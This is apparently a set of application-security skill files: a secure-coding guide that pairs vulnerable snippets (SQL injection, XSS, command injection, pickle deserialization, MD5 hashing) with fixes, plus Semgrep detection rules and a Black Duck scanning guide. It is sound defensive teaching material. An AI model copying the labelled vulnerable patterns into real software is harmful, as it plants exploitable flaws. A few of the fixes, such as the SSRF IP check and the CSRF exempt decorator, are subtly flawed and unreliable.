- [Command Injection](#command-injection)
- [Path Traversal](#path-traversal)
- [Insecure Deserialization](#insecure-deserialization)
- [Weak Cryptography](#weak-cryptography)
- [Authentication & Session Management](#authentication--session-management)
- [CSRF](#csrf)
- [SSRF](#ssrf)
- [XXE](#xxe)
## SQL Injection
### Vulnerability Pattern
```python
# VULNERABLE
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query)
```
### Secure Remediation
```python
# SECURE: Use parameterized queries
query = "SELECT * FROM users WHERE id = %s"
cursor.execute(query, (user_id,))
# Or use ORM
user = User.objects.get(id=user_id)
```
### Framework-Specific Solutions
**Django:**
```python
# Use Django ORM (safe by default)
User.objects.filter(email=user_email)
# For raw SQL, use parameterized queries
User.objects.raw('SELECT * FROM myapp_user WHERE email = %s', [user_email])
```
**Node.js (Sequelize):**
```javascript
// Use parameterized queries
User.findAll({
where: { email: userEmail }
});
// Or use replacements
sequelize.query(
'SELECT * FROM users WHERE email = :email',
{ replacements: { email: userEmail } }
);
```
**Java (JDBC):**
```java
// Use PreparedStatement
String query = "SELECT * FROM users WHERE id = ?";
PreparedStatement stmt = conn.prepareStatement(query);
stmt.setInt(1, userId);
ResultSet rs = stmt.executeQuery();
```
## Cross-Site Scripting (XSS)
### Vulnerability Pattern
```javascript
// VULNERABLE
element.innerHTML = userInput;
document.write(userInput);
```
### Secure Remediation
```javascript
// SECURE: Use textContent for text
element.textContent = userInput;
// Or properly escape HTML
element.innerHTML = escapeHtml(userInput);
function escapeHtml(unsafe) {
return unsafe
.replace(/&/g, "&amp;")
.replace(/</g, "&lt;")
.replace(/>/g, "&gt;")
.replace(/"/g, "&quot;")
.replace(/'/g, "&#039;");
}
```
### Framework-Specific Solutions
**React:**
```javascript
// React auto-escapes by default
<div>{userInput}</div>
// For HTML content, sanitize first
import DOMPurify from 'dompurify';
<div dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(userInput)}} />
```
**Flask/Jinja2:**
```python
# Templates auto-escape by default
{{ user_input }}
# For HTML content, sanitize
from markupsafe import Markup
import bleach
{{ Markup(bleach.clean(user_input)) }}
```
**Django:**
```django
{# Auto-escaped by default #}
{{ user_input }}
{# Mark as safe only after sanitization #}
{{ user_input|safe }}
```
## Command Injection
### Vulnerability Pattern
```python
# VULNERABLE
os.system(f"ping {user_host}")
subprocess.call(f"ls {user_directory}", shell=True)
```
### Secure Remediation
```python
# SECURE: Use subprocess with list arguments
import subprocess
subprocess.run(['ping', '-c', '1', user_host],
capture_output=True, check=True)
# Validate input against allowlist
import shlex
if not re.match(r'^[a-zA-Z0-9.-]+$', user_host):
raise ValueError("Invalid hostname")
subprocess.run(['ping', '-c', '1', user_host])
```
**Node.js:**
```javascript
// VULNERABLE
exec(`ls ${userDir}`);
// SECURE
const { execFile } = require('child_process');
execFile('ls', [userDir], (error, stdout) => {
// Handle output
});
```
## Path Traversal
### Vulnerability Pattern
```python
# VULNERABLE
file_path = os.path.join('/uploads', user_filename)
with open(file_path) as f:
return f.read()
```
### Secure Remediation
```python
# SECURE: Validate and normalize path
import os
from pathlib import Path
def safe_join(directory, user_path):
# Normalize and resolve path
base_dir = Path(directory).resolve()
file_path = (base_dir / user_path).resolve()
# Ensure it's within base directory
if not str(file_path).startswith(str(base_dir)):
raise ValueError("Path traversal detected")
return file_path
try:
safe_path = safe_join('/uploads', user_filename)
with open(safe_path) as f:
return f.read()
except ValueError:
return "Invalid filename"
```
## Insecure Deserialization
### Vulnerability Pattern
```python
# VULNERABLE
import pickle
data = pickle.loads(user_data)
```
### Secure Remediation
```python
# SECURE: Use safe formats like JSON
import json
data = json.loads(user_data)
# If you must deserialize, validate and restrict
import yaml
data = yaml.safe_load(user_data) # Use safe_load, not load
```
**Node.js:**
```javascript
// VULNERABLE
const data = eval(userInput);
const obj = Function(userInput)();
// SECURE
const data = JSON.parse(userInput);
// For complex objects, use schema validation
const Joi = require('joi');
const schema = Joi.object({
name: Joi.string().required(),
email: Joi.string().email().required()
});
const { value, error } = schema.validate(JSON.parse(userInput));
```
## Weak Cryptography
### Vulnerability Pattern
```python
# VULNERABLE
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()
```
### Secure Remediation
```python
# SECURE: Use bcrypt or argon2
import bcrypt
# Hashing
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
# Verification
if bcrypt.checkpw(password.encode(), stored_hash):
print("Password correct")
# Or use argon2
from argon2 import PasswordHasher
ph = PasswordHasher()
hash = ph.hash(password)
ph.verify(hash, password)
```
**Encryption:**
```python
# VULNERABLE
from Crypto.Cipher import DES
cipher = DES.new(key, DES.MODE_ECB)
# SECURE: Use AES-GCM
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os
key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)
nonce = os.urandom(12)
ciphertext = aesgcm.encrypt(nonce, plaintext, associated_data)
```
## Authentication & Session Management
### Vulnerability Pattern
```javascript
// VULNERABLE
app.use(session({
secret: 'weak-secret',
cookie: { secure: false }
}));
```
### Secure Remediation
```javascript
// SECURE
const session = require('express-session');
app.use(session({
secret: process.env.SESSION_SECRET, // Strong random secret
resave: false,
saveUninitialized: false,
cookie: {
secure: true, // HTTPS only
httpOnly: true, // No JavaScript access
sameSite: 'strict', // CSRF protection
maxAge: 3600000 // 1 hour
}
}));
```
**Password Requirements:**
```python
# Implement strong password policy
import re
def validate_password(password):
if len(password) < 12:
return False
if not re.search(r'[A-Z]', password):
return False
if not re.search(r'[a-z]', password):
return False
if not re.search(r'[0-9]', password):
return False
if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
return False
return True
```
## CSRF
### Vulnerability Pattern
```python
# VULNERABLE: No CSRF protection
@app.route('/transfer', methods=['POST'])
def transfer():
amount = request.form['amount']
to_account = request.form['to']
# Process transfer
```
### Secure Remediation
```python
# SECURE: Use CSRF tokens
from flask_wtf.csrf import CSRFProtect
csrf = CSRFProtect(app)
@app.route('/transfer', methods=['POST'])
@csrf.exempt # Only if using custom CSRF
def transfer():
# CSRF token automatically validated
amount = request.form['amount']
to_account = request.form['to']
```
**Express.js:**
```javascript
const csrf = require('csurf');
const csrfProtection = csrf({ cookie: true });
app.post('/transfer', csrfProtection, (req, res) => {
// CSRF token validated
const { amount, to } = req.body;
});
```
## SSRF
### Vulnerability Pattern
```python
# VULNERABLE
import requests
url = request.args.get('url')
response = requests.get(url)
```
### Secure Remediation
```python
# SECURE: Validate URLs and use allowlist
import requests
from urllib.parse import urlparse
ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com']
def safe_fetch(url):
parsed = urlparse(url)
# Check protocol
if parsed.scheme not in ['http', 'https']:
raise ValueError("Invalid protocol")
# Check domain against allowlist
if parsed.netloc not in ALLOWED_DOMAINS:
raise ValueError("Domain not allowed")
# Block internal IPs
import ipaddress
try:
ip = ipaddress.ip_address(parsed.hostname)
if ip.is_private:
raise ValueError("Private IP not allowed")
except ValueError:
pass # Not an IP, continue
return requests.get(url, timeout=5)
```
## XXE
### Vulnerability Pattern
```python
# VULNERABLE
from lxml import etree
tree = etree.parse(user_xml)
```
### Secure Remediation
```python
# SECURE: Disable external entities
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False
)
tree = etree.parse(user_xml, parser)
# Or use defusedxml
from defusedxml import ElementTree
tree = ElementTree.parse(user_xml)
```
**Node.js:**
```javascript
// Use secure XML parser
const libxmljs = require('libxmljs');
const xml = libxmljs.parseXml(userXml, {
noent: false, // Disable entity expansion
dtdload: false,
dtdvalid: false
});
```
## General Security Principles
1. **Input Validation**: Validate all user input against expected format
2. **Output Encoding**: Encode output based on context (HTML, URL, SQL, etc.)
3. **Least Privilege**: Grant minimum necessary permissions
4. **Defense in Depth**: Use multiple layers of security controls
5. **Fail Securely**: Ensure failures don't expose sensitive data
6. **Secure Defaults**: Use secure configuration by default
7. **Keep Dependencies Updated**: Regularly update libraries and frameworks
## Testing Remediation
After applying fixes:
1. **Verify with Semgrep**: Re-scan to ensure vulnerability is resolved
```bash
semgrep --config <ruleset> fixed_file.py
```
2. **Manual Testing**: Attempt to exploit the vulnerability
3. **Code Review**: Have peer review the fix
4. **Integration Tests**: Add tests to prevent regression
## References
- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [CWE Mitigations](https://cwe.mitre.org/)
- [Semgrep Autofix](https://semgrep.dev/docs/writing-rules/autofix/)

View File

@@ -0,0 +1,425 @@
# Semgrep Rule Library
Curated collection of useful Semgrep rulesets and custom rule writing guidance.
## Table of Contents
- [Official Rulesets](#official-rulesets)
- [Language-Specific Rules](#language-specific-rules)
- [Framework-Specific Rules](#framework-specific-rules)
- [Custom Rule Writing](#custom-rule-writing)
- [Rule Testing](#rule-testing)
## Official Rulesets
### Comprehensive Rulesets
| Ruleset | Config | Description | Use Case |
|---------|--------|-------------|----------|
| Auto | `auto` | Automatically selected rules based on detected languages | Quick scans, baseline |
| Security Audit | `p/security-audit` | Comprehensive security rules across languages | Deep security review |
| OWASP Top 10 | `p/owasp-top-ten` | OWASP Top 10 2021 coverage | Compliance, security gates |
| CWE Top 25 | `p/cwe-top-25` | SANS/CWE Top 25 dangerous errors | Critical vulnerability detection |
| CI | `p/ci` | Fast, low false-positive rules for CI/CD | Pull request gates |
| Default | `p/default` | Balanced security and quality rules | General purpose scanning |
### Specialized Rulesets
| Ruleset | Config | Focus Area |
|---------|--------|------------|
| Secrets | `p/secrets` | Hard-coded credentials, API keys |
| Cryptography | `p/crypto` | Weak crypto, hashing issues |
| Supply Chain | `p/supply-chain` | Dependency vulnerabilities |
| JWT | `p/jwt` | JSON Web Token security |
| SQL Injection | `p/sql-injection` | SQL injection patterns |
| XSS | `p/xss` | Cross-site scripting |
| Command Injection | `p/command-injection` | OS command injection |
## Language-Specific Rules
### Python
```bash
# Django security
semgrep --config "p/django"
# Flask security
semgrep --config "r/python.flask.security"
# General Python security
semgrep --config "r/python.lang.security"
# Specific vulnerabilities
semgrep --config "r/python.lang.security.audit.exec-used"
semgrep --config "r/python.lang.security.audit.unsafe-pickle"
semgrep --config "r/python.lang.security.audit.dangerous-subprocess-use"
```
**Key Python Rules:**
- `python.django.security.injection.sql.sql-injection-db-cursor-execute`
- `python.flask.security.xss.audit.template-xss`
- `python.lang.security.audit.exec-used`
- `python.lang.security.audit.dangerous-os-module-methods`
- `python.lang.security.audit.hashlib-md5-used`
### JavaScript/TypeScript
```bash
# Express.js security
semgrep --config "p/express"
# React security
semgrep --config "p/react"
# Node.js security
semgrep --config "r/javascript.lang.security"
# Specific vulnerabilities
semgrep --config "r/javascript.lang.security.audit.eval-detected"
semgrep --config "r/javascript.lang.security.audit.unsafe-exec"
```
**Key JavaScript Rules:**
- `javascript.express.security.audit.xss.mustache.var-in-href`
- `javascript.lang.security.audit.eval-detected`
- `javascript.lang.security.audit.path-traversal`
- `javascript.sequelize.security.audit.sequelize-injection-express`
### Java
```bash
# Spring security
semgrep --config "p/spring"
# General Java security
semgrep --config "r/java.lang.security"
# Specific frameworks
semgrep --config "r/java.spring.security"
```
**Key Java Rules:**
- `java.lang.security.audit.sqli.jdbc-sqli`
- `java.lang.security.audit.xxe.xmlinputfactory-xxe`
- `java.spring.security.audit.spring-cookie-missing-httponly`
### Go
```bash
# Go security rules
semgrep --config "r/go.lang.security"
# Specific vulnerabilities
semgrep --config "r/go.lang.security.audit.net.use-of-tls-with-go-sql-driver"
semgrep --config "r/go.lang.security.audit.crypto.use_of_weak_crypto"
```
### PHP
```bash
# PHP security
semgrep --config "p/php"
# Laravel security
semgrep --config "r/php.laravel.security"
# Specific vulnerabilities
semgrep --config "r/php.lang.security.audit.sqli"
semgrep --config "r/php.lang.security.audit.dangerous-exec"
```
## Framework-Specific Rules
### Web Frameworks
**Django:**
```bash
semgrep --config "p/django"
# Covers: SQL injection, XSS, CSRF, auth issues
```
**Flask:**
```bash
semgrep --config "r/python.flask.security"
# Covers: XSS, debug mode, secure cookies
```
**Express.js:**
```bash
semgrep --config "p/express"
# Covers: XSS, CSRF, session config, CORS
```
**Spring Boot:**
```bash
semgrep --config "p/spring"
# Covers: SQL injection, XXE, auth, SSRF
```
### Cloud & Infrastructure
**Terraform:**
```bash
semgrep --config "r/terraform.lang.security"
# Covers: S3 buckets, security groups, encryption
```
**Kubernetes:**
```bash
semgrep --config "r/yaml.kubernetes.security"
# Covers: privileged containers, secrets, rbac
```
**Docker:**
```bash
semgrep --config "r/dockerfile.security"
# Covers: unsafe base images, secrets, root user
```
## Custom Rule Writing
### Rule Anatomy
```yaml
rules:
- id: custom-rule-id
pattern: execute($SQL)
message: Potential security issue detected
severity: WARNING
languages: [python]
metadata:
category: security
cwe: "CWE-89"
owasp: "A03:2021-Injection"
confidence: HIGH
```
### Pattern Types
**1. Basic Pattern**
```yaml
pattern: dangerous_function($ARG)
```
**2. Pattern-Inside (Context)**
```yaml
patterns:
- pattern: execute($QUERY)
- pattern-inside: |
$QUERY = $USER_INPUT + ...
```
**3. Pattern-Not (Exclusion)**
```yaml
patterns:
- pattern: execute($QUERY)
- pattern-not: execute("SELECT * FROM safe_table")
```
**4. Pattern-Either (OR logic)**
```yaml
pattern-either:
- pattern: eval($ARG)
- pattern: exec($ARG)
```
**5. Metavariable Comparison**
```yaml
patterns:
- pattern: crypto.encrypt($DATA, $KEY)
- metavariable-comparison:
metavariable: $KEY
comparison: len($KEY) < 16
```
### Example Custom Rules
**Detect Hard-coded AWS Keys:**
```yaml
rules:
- id: hardcoded-aws-key
patterns:
- pattern-regex: 'AKIA[0-9A-Z]{16}'
message: Hard-coded AWS access key detected
severity: ERROR
languages: [python, javascript, java, go]
metadata:
category: security
cwe: "CWE-798"
confidence: HIGH
```
**Detect Unsafe File Operations:**
```yaml
rules:
- id: unsafe-file-read
patterns:
- pattern: open($PATH, ...)
- pattern-inside: |
def $FUNC(..., $USER_INPUT, ...):
...
$PATH = ... + $USER_INPUT + ...
...
message: File path constructed from user input (path traversal risk)
severity: WARNING
languages: [python]
metadata:
cwe: "CWE-22"
owasp: "A01:2021-Broken-Access-Control"
```
**Detect Missing CSRF Protection:**
```yaml
rules:
- id: flask-missing-csrf
patterns:
- pattern: |
@app.route($PATH, methods=[..., "POST", ...])
def $FUNC(...):
...
- pattern-not-inside: |
@csrf.exempt
...
- pattern-not-inside: |
csrf_token = ...
...
message: POST route without CSRF protection
severity: ERROR
languages: [python]
metadata:
cwe: "CWE-352"
owasp: "A01:2021-Broken-Access-Control"
```
**Detect Insecure Random:**
```yaml
rules:
- id: insecure-random-for-crypto
patterns:
- pattern-either:
- pattern: random.random()
- pattern: random.randint(...)
- pattern-inside: |
def ..._token(...):
...
message: Using insecure random for security token
severity: ERROR
languages: [python]
metadata:
cwe: "CWE-330"
fix: "Use secrets module: secrets.token_bytes(32)"
```
### Rule Metadata Best Practices
Include comprehensive metadata:
```yaml
metadata:
category: security # Type of issue
cwe: "CWE-XXX" # CWE mapping
owasp: "AXX:2021-Name" # OWASP category
confidence: HIGH|MEDIUM|LOW # Detection confidence
likelihood: HIGH|MEDIUM|LOW # Exploitation likelihood
impact: HIGH|MEDIUM|LOW # Security impact
subcategory: [vuln-type] # More specific categorization
source-rule: url # If adapted from elsewhere
references:
- https://example.com/docs
```
## Rule Testing
### Test File Structure
```
custom-rules/
├── rules.yaml # Your custom rules
└── tests/
├── test-sqli.py # Test cases
└── test-xss.js # Test cases
```
### Writing Tests
```python
# tests/test-sqli.py
# ruleid: custom-sql-injection
cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
# ok: custom-sql-injection
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
```
### Running Tests
```bash
# Test custom rules
semgrep --config rules.yaml --test tests/
# Validate rule syntax
semgrep --validate --config rules.yaml
```
## Rule Performance Optimization
### 1. Use Specific Patterns
```yaml
# SLOW
pattern: $X
# FAST
pattern: dangerous_function($X)
```
### 2. Limit Language Scope
```yaml
# Only scan relevant languages
languages: [python, javascript]
```
### 3. Use Pattern-Inside Wisely
```yaml
# Narrow down context early
patterns:
- pattern-inside: |
def handle_request(...):
...
- pattern: execute($QUERY)
```
### 4. Exclude Test Files
```yaml
paths:
exclude:
- "*/test_*.py"
- "*/tests/*"
- "*_test.go"
```
## Community Rules
Explore community-contributed rules:
```bash
# Browse rules by technology
semgrep --config "r/python.django"
semgrep --config "r/javascript.react"
semgrep --config "r/go.gorilla"
# Browse by vulnerability type
semgrep --config "r/generic.secrets"
semgrep --config "r/generic.html-templates"
```
**Useful Community Rulesets:**
- `r/python.aws-lambda.security` - AWS Lambda security
- `r/terraform.aws.security` - AWS Terraform
- `r/dockerfile.best-practice` - Docker best practices
- `r/yaml.github-actions.security` - GitHub Actions security
## References
- [Semgrep Rule Syntax](https://semgrep.dev/docs/writing-rules/rule-syntax/)
- [Semgrep Registry](https://semgrep.dev/explore)
- [Pattern Examples](https://semgrep.dev/docs/writing-rules/pattern-examples/)
- [Rule Writing Tutorial](https://semgrep.dev/learn)

View File

@@ -0,0 +1,391 @@
---
name: sca-blackduck
description: >
Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source
vulnerabilities, license compliance risks, and supply chain security threats with CVE,
CWE, and OWASP framework mapping. Use when: (1) Scanning dependencies for known
vulnerabilities and security risks, (2) Analyzing open source license compliance and
legal risks, (3) Identifying outdated or unmaintained dependencies, (4) Integrating
SCA into CI/CD pipelines for continuous dependency monitoring, (5) Providing remediation
guidance for vulnerable dependencies with CVE and CWE mappings, (6) Assessing supply
chain security risks and third-party component threats.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [sca, blackduck, dependency-scanning, vulnerability-management, license-compliance, supply-chain, cve, owasp]
frameworks: [OWASP, CWE, NIST, SOC2, PCI-DSS]
dependencies:
tools: [docker, git, detect]
access: [blackduck-url, api-token]
references:
- https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html
- https://owasp.org/www-project-dependency-check/
- https://nvd.nist.gov/
- https://www.cisa.gov/sbom
---
# Software Composition Analysis with Black Duck
## Overview
Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify
security vulnerabilities, license compliance risks, and supply chain threats in open source
dependencies. This skill provides automated dependency scanning, vulnerability detection with
CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards.
## Quick Start
Scan a project for dependency vulnerabilities:
```bash
# Using Black Duck Detect (recommended)
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.project.name="MyProject" \
--detect.project.version.name="1.0.0"
```
Scan with policy violation enforcement:
```bash
# Fail build on policy violations
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL
```
## Core Workflows
### Workflow 1: Initial Dependency Security Assessment
Progress:
[ ] 1. Identify package managers and dependency manifests in codebase
[ ] 2. Run `scripts/blackduck_scan.py` with project detection
[ ] 3. Analyze vulnerability findings categorized by severity (CRITICAL, HIGH, MEDIUM, LOW)
[ ] 4. Map CVE findings to CWE and OWASP Top 10 categories
[ ] 5. Review license compliance risks and policy violations
[ ] 6. Generate prioritized remediation report with upgrade recommendations
Work through each step systematically. Check off completed items.
### Workflow 2: Vulnerability Remediation
1. Review scan results and identify critical/high severity vulnerabilities
2. For each vulnerability:
- Check if fixed version is available
- Review breaking changes in upgrade path
- Consult `references/remediation_strategies.md` for vulnerability-specific guidance
3. Apply dependency updates using package manager
4. Re-scan to validate fixes
5. Document any vulnerabilities accepted as risk with justification
### Workflow 3: License Compliance Analysis
1. Run Black Duck scan with license risk detection enabled
2. Review components flagged with license compliance issues
3. Categorize by risk level:
- **High Risk**: GPL, AGPL (copyleft licenses)
- **Medium Risk**: LGPL, MPL (weak copyleft)
- **Low Risk**: Apache, MIT, BSD (permissive)
4. Consult legal team for high-risk license violations
5. Document license decisions and create policy exceptions if approved
### Workflow 4: CI/CD Integration
1. Add Black Duck Detect to CI/CD pipeline using `assets/ci_integration/`
2. Configure environment variables for Black Duck URL and API token
3. Set policy thresholds (fail on CRITICAL/HIGH vulnerabilities)
4. Enable SBOM generation for supply chain transparency
5. Configure alerts for new vulnerabilities in production dependencies
### Workflow 5: Supply Chain Risk Assessment
1. Identify direct and transitive dependencies
2. Analyze component quality metrics:
- Maintenance activity (last update, commit frequency)
- Community health (contributors, issue resolution)
- Security track record (historical CVEs)
3. Flag high-risk components (unmaintained, few maintainers, security issues)
4. Review alternative components with better security posture
5. Document supply chain risks and mitigation strategies
## Security Considerations
- **Sensitive Data Handling**: Black Duck scans require API tokens with read/write access.
Store credentials securely in secrets management (Vault, AWS Secrets Manager).
Never commit tokens to version control.
- **Access Control**: Limit Black Duck access to authorized security and development teams.
Use role-based access control (RBAC) for scan result visibility and policy management.
- **Audit Logging**: Log all scan executions with timestamps, user, project version, and
findings count for compliance auditing. Enable Black Duck's built-in audit trail.
- **Compliance**: SCA scanning supports SOC2, PCI-DSS, GDPR, and HIPAA compliance by
tracking third-party component risks. Generate SBOM for regulatory requirements.
- **Safe Defaults**: Configure policies to fail builds on CRITICAL and HIGH severity
vulnerabilities. Use allowlists sparingly with documented business justification.
## Supported Package Managers
Black Duck Detect automatically identifies and scans:
- **JavaScript/Node**: npm, yarn, pnpm
- **Python**: pip, pipenv, poetry
- **Java**: Maven, Gradle
- **Ruby**: Bundler, gem
- **.NET**: NuGet
- **Go**: go modules
- **PHP**: Composer
- **Rust**: Cargo
- **C/C++**: Conan, vcpkg
- **Docker**: Container image layers
## Bundled Resources
### Scripts
- `scripts/blackduck_scan.py` - Full-featured scanning with CVE/CWE mapping and reporting
- `scripts/analyze_results.py` - Parse Black Duck results and generate remediation report
- `scripts/sbom_generator.sh` - Generate SBOM (CycloneDX/SPDX) from scan results
- `scripts/policy_checker.py` - Validate compliance with organizational security policies
### References
- `references/cve_cwe_owasp_mapping.md` - CVE to CWE and OWASP Top 10 mapping
- `references/remediation_strategies.md` - Vulnerability remediation patterns and upgrade strategies
- `references/license_risk_guide.md` - License compliance risk assessment and legal guidance
- `references/supply_chain_threats.md` - Common supply chain attack patterns and mitigations
### Assets
- `assets/ci_integration/github_actions.yml` - GitHub Actions workflow for Black Duck scanning
- `assets/ci_integration/gitlab_ci.yml` - GitLab CI configuration for SCA
- `assets/ci_integration/jenkins_pipeline.groovy` - Jenkins pipeline with Black Duck integration
- `assets/policy_templates/` - Pre-configured security and compliance policies
- `assets/blackduck_config.yml` - Recommended Black Duck Detect configuration
## Common Patterns
### Pattern 1: Daily Dependency Security Baseline
```bash
# Run comprehensive scan and generate SBOM
scripts/blackduck_scan.py \
--project "MyApp" \
--version "1.0.0" \
--output results.json \
--generate-sbom \
--severity CRITICAL HIGH
```
### Pattern 2: Pull Request Dependency Gate
```bash
# Scan PR changes, fail on new high-severity vulnerabilities
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.policy.check.fail.on.severities=CRITICAL,HIGH \
--detect.wait.for.results=true
```
### Pattern 3: License Compliance Audit
```bash
# Generate license compliance report
scripts/blackduck_scan.py \
--project "MyApp" \
--version "1.0.0" \
--report-type license \
--output license-report.pdf
```
### Pattern 4: Vulnerability Research and Triage
```bash
# Extract CVE details and remediation guidance
scripts/analyze_results.py \
--input scan-results.json \
--filter-severity CRITICAL HIGH \
--include-remediation \
--output vulnerability-report.md
```
### Pattern 5: SBOM Generation for Compliance
```bash
# Generate Software Bill of Materials (CycloneDX format)
scripts/sbom_generator.sh \
--project "MyApp" \
--version "1.0.0" \
--format cyclonedx \
--output sbom.json
```
## Integration Points
### CI/CD Integration
- **GitHub Actions**: Use `synopsys-sig/detect-action@v1` with policy enforcement
- **GitLab CI**: Run as security scanning job with dependency scanning template
- **Jenkins**: Execute Detect as pipeline step with quality gates
- **Azure DevOps**: Integrate using Black Duck extension from marketplace
See `assets/ci_integration/` for ready-to-use pipeline configurations.
### Security Tool Integration
- **SIEM/SOAR**: Export findings in JSON/CSV for ingestion into Splunk, ELK
- **Vulnerability Management**: Integrate with Jira, ServiceNow, DefectDojo
- **Secret Scanning**: Combine with Gitleaks, TruffleHog for comprehensive security
- **SAST Tools**: Use alongside Semgrep, Bandit for defense-in-depth
### SDLC Integration
- **Requirements Phase**: Define acceptable license and vulnerability policies
- **Development**: IDE plugins provide real-time dependency security feedback
- **Code Review**: Automated dependency review in PR workflow
- **Testing**: Validate security of third-party components
- **Deployment**: Final dependency gate before production release
- **Operations**: Continuous monitoring for new vulnerabilities in production
## Severity Classification
Black Duck classifies vulnerabilities by CVSS score and severity:
- **CRITICAL** (CVSS 9.0-10.0): Remotely exploitable with severe impact (RCE, SQLi)
- **HIGH** (CVSS 7.0-8.9): Significant security risks requiring immediate attention
- **MEDIUM** (CVSS 4.0-6.9): Moderate security weaknesses needing remediation
- **LOW** (CVSS 0.1-3.9): Minor security issues or defense-in-depth improvements
- **NONE** (CVSS 0.0): Informational findings
## Policy Management
### Creating Security Policies
1. Define organizational risk thresholds (e.g., fail on CVSS >= 7.0)
2. Configure license compliance rules using `assets/policy_templates/`
3. Set component usage policies (blocklists for known malicious packages)
4. Enable operational risk policies (unmaintained dependencies, age thresholds)
5. Document policy exceptions with business justification and expiration dates
### Policy Enforcement
```bash
# Enforce custom policy during scan
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL \
--detect.wait.for.results=true
```
## Performance Optimization
For large projects with many dependencies:
```bash
# Use intelligent scan mode (incremental)
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--detect.detector.search.depth=3 \
--detect.blackduck.signature.scanner.snippet.matching=SNIPPET_MATCHING \
--detect.parallel.processors=4
# Exclude test and development dependencies
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--detect.excluded.detector.types=PIP,NPM_PACKAGE_LOCK \
--detect.npm.include.dev.dependencies=false
```
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
- Review vulnerability applicability (is vulnerable code path used?)
- Use vulnerability suppression with documented justification
- Configure component matching precision in Black Duck settings
- Verify component identification accuracy (check for misidentified packages)
### Issue: License Compliance Violations
**Solution**:
- Review component licenses in Black Duck dashboard
- Consult `references/license_risk_guide.md` for risk assessment
- Replace high-risk licensed components with permissive alternatives
- Obtain legal approval and document policy exceptions
### Issue: Scan Not Detecting Dependencies
**Solution**:
- Verify package manager files are present (package.json, requirements.txt, pom.xml)
- Check Black Duck Detect logs for detector failures
- Ensure dependencies are installed before scanning (run npm install, pip install)
- Use `--detect.detector.search.depth` to increase search depth
### Issue: Slow Scan Performance
**Solution**:
- Use snippet matching instead of full file matching
- Increase `--detect.parallel.processors` for multi-core systems
- Exclude test directories and development dependencies
- Use intelligent/rapid scan mode for faster feedback
## Advanced Usage
### Vulnerability Analysis
For detailed vulnerability research, consult `references/remediation_strategies.md`.
Key remediation strategies:
1. **Upgrade**: Update to fixed version (preferred)
2. **Patch**: Apply security patch if upgrade not feasible
3. **Replace**: Switch to alternative component without vulnerability
4. **Mitigate**: Implement workarounds or compensating controls
5. **Accept**: Document risk acceptance with business justification
### Supply Chain Security
See `references/supply_chain_threats.md` for comprehensive coverage of:
- Dependency confusion attacks
- Typosquatting and malicious packages
- Compromised maintainer accounts
- Backdoored dependencies
- Unmaintained and abandoned projects
### SBOM Generation and Management
Black Duck supports standard SBOM formats:
- **CycloneDX**: Modern, machine-readable format for vulnerability management
- **SPDX**: ISO/IEC standard for software package data exchange
Use SBOMs for:
- Supply chain transparency
- Regulatory compliance (Executive Order 14028)
- Incident response (rapid vulnerability identification)
- M&A due diligence
## Best Practices
1. **Shift Left**: Integrate SCA early in development lifecycle
2. **Policy-Driven**: Define clear policies for vulnerabilities and licenses
3. **Continuous Monitoring**: Run scans on every commit and nightly for production
4. **Remediation Prioritization**: Focus on exploitable vulnerabilities first
5. **SBOM Management**: Maintain up-to-date SBOM for all production applications
6. **Supply Chain Hygiene**: Regularly review dependency health and maintainability
7. **License Compliance**: Establish license approval process before adoption
8. **Defense in Depth**: Combine SCA with SAST, DAST, and security testing
## References
- [Black Duck Documentation](https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html)
- [Black Duck Detect](https://sig-product-docs.synopsys.com/bundle/integrations-detect/page/introduction.html)
- [OWASP Dependency-Check](https://owasp.org/www-project-dependency-check/)
- [National Vulnerability Database](https://nvd.nist.gov/)
- [SBOM Standards (CISA)](https://www.cisa.gov/sbom)
- [CycloneDX SBOM Standard](https://cyclonedx.org/)
- [SPDX License List](https://spdx.org/licenses/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,213 @@
# Black Duck Detect Configuration
# Place this file in the root of your project or reference it with:
# --detect.yaml.configuration.path=/path/to/blackduck_config.yml
# Black Duck Server Configuration
blackduck:
url: ${BLACKDUCK_URL} # Set via environment variable
api:
token: ${BLACKDUCK_TOKEN} # Set via environment variable
timeout: 300
trust.cert: false
# Project Configuration
detect:
project:
name: ${PROJECT_NAME:MyProject}
version:
name: ${PROJECT_VERSION:1.0.0}
description: "Software Composition Analysis with Black Duck"
tier: 3 # Project tier (1-5, 1=highest priority)
# Detection Configuration
detector:
search:
depth: 3 # How deep to search for build files
